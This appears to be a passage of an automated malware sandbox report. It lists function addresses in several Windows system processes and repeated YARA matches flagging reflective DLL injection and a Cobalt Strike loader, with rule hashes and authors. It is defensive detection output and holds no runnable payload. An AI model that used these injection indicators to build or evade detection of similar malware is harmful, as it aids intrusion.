                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10004B5B8_2_10004B5B
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10013B818_2_10013B81
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10001B948_2_10001B94
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10003BFD8_2_10003BFD
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1003AC3E8_2_1003AC3E
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10003CEA8_2_10003CEA
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10012D838_2_10012D83
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10039FBC8_2_10039FBC
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_3_006B023D9_3_006B023D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1000B13E9_2_1000B13E
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_100011839_2_10001183
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_100133729_2_10013372
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1003A3D49_2_1003A3D4
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1003942A9_2_1003942A
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_100426569_2_10042656
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1003A8099_2_1003A809
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10033A509_2_10033A50
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10039AC89_2_10039AC8
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10004B5B9_2_10004B5B
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10013B819_2_10013B81
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10001B949_2_10001B94
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10003BFD9_2_10003BFD
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1003AC3E9_2_1003AC3E
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10003CEA9_2_10003CEA
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10012D839_2_10012D83
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10039FBC9_2_10039FBC
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_3_02AC023D10_3_02AC023D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000B13E10_2_1000B13E
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000118310_2_10001183
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1004265610_2_10042656
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10033A5010_2_10033A50
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10039AC810_2_10039AC8
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10004B5B10_2_10004B5B
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10001B9410_2_10001B94
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10003BFD10_2_10003BFD
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10003CEA10_2_10003CEA
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10012D8310_2_10012D83
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 1000191F appears 31 times
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 1004EB10 appears 138 times
                      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 10008FE1 appears 36 times
                      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 1003248D appears 31 times
                      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 1003CB40 appears 42 times
                      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 1004EB10 appears 143 times
                      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 1000191F appears 31 times
                      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 1000A3F4 appears 87 times
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: String function: 10008FE1 appears 36 times
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: String function: 1003248D appears 31 times
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: String function: 1003CB40 appears 42 times
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: String function: 1004EB10 appears 143 times
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: String function: 1000191F appears 31 times
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: String function: 1000A3F4 appears 87 times
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 10008FE1 appears 36 times
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 1003248D appears 31 times
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 1003CB40 appears 42 times
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 1004EB10 appears 143 times
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 1000191F appears 31 times
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 1000A3F4 appears 87 times
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: String function: 10008FE1 appears 36 times
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: String function: 1003248D appears 31 times
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: String function: 1003CB40 appears 42 times
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: String function: 1004EB10 appears 143 times
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: String function: 1000191F appears 31 times
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: String function: 1000A3F4 appears 87 times
                      Source: 1731043030539.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.3.svchost.exe.1ad89460818.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.0.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b7f0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b720000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b650000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.3.svchost.exe.1ad89460818.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 3.3.control.exe.b107f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 10.3.raserver.exe.2ac07f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b170000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 8.3.resmon.exe.23007f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 9.2.BackgroundTransferHost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 6.3.fontview.exe.8207f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 3.2.control.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 6.2.fontview.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1800280b0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 10.2.raserver.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.3.svchost.exe.1ad894834c8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 8.2.resmon.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 1.2.svchost.exe.1ad8b580000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
